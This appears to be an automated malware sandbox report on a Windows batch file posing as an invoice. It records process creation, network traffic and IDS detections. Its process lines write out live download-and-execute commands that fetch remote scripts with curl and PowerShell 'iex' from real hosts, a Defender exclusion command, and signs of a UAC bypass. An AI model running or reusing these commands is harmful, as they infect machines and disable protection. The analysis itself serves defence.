            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,11_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF40B
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then add byte ptr [edi], dh9_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then push esi9_2_6FD7F640
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then add byte ptr [edi], dh11_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then push esi11_2_6FD7F640

            Networking

            Source: Network trafficSuricata IDS: 2841717 - Severity 1 - ETPRO MALWARE PowerShell/TrojanDownloader Casbaneiro CnC : 192.168.11.20:49750 -> 62.72.3.210:80
            Source: Network trafficSuricata IDS: 2052642 - Severity 1 - ET MALWARE Horabot Payload Inbound : 93.127.200.211:443 -> 192.168.11.20:49752
            Source: Network trafficSuricata IDS: 2834717 - Severity 1 - ETPRO MALWARE PowerShell Inbound with Antivirus Enumeration and Downloading Capabilities : 93.127.200.211:443 -> 192.168.11.20:49752
            Source: global trafficHTTP traffic detected: GET /a/08/150822/up/up HTTP/1.1Host: fsnat.shopConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /ldht/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.72.3.210Content-Length: 94Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: ASMUNDA-ASSC ASMUNDA-ASSC
            Source: Joe Sandbox ViewASN Name: PRTL-DE PRTL-DE
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: fsnat.shop
            Source: unknownHTTP traffic detected: POST /ldht/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.72.3.210Content-Length: 94Expect: 100-continueConnection: Keep-Alive
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.72.3.210
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.38.217.167
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000004.00000002.30086145780.000001E790A45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co:
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzi
            Source: powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzi
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com
            Source: curl.exe, 00000002.00000002.29379756087.000001AA88A90000.00000004.00000020.00020000.00000000.sdmp, Factura-2410-CFDI.batString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/ggsabadon.appspot.com/o/md1910_.zip?alt=media&token=0c46
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzi
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownHTTPS traffic detected: 93.127.200.211:443 -> 192.168.11.20:49752 version: TLS 1.2

            System Summary

            Source: amsi64_6872.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi64_7380.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32\fodhelper.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\exe.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\_kjfech8_V.exe (copy)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\MSVCR100.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\i7.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\MSVCR100.dll (copy)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\WebView2Loader.dll (copy)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\WebView2Loader.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\jli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32\fodhelper.exe
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
            Source: jli.dll.4.dr Static PE information: Number of sections : 11 > 10
            Source: amsi64_6872.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi64_7380.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine Classification label: mal100.rans.expl.evad.winBAT@26/50@1/3
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCD3BB _getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,memset,GetDiskFreeSpaceA,GetLastError,_errno
            Source: C:\Windows\System32\curl.exe File created: C:\Users\Public\Documents\vs1.ps1
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1492
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blqdhdij.dyb.ps1
            Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\curl.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
            Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 -
            Source: unknown Process created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe"
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe"
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
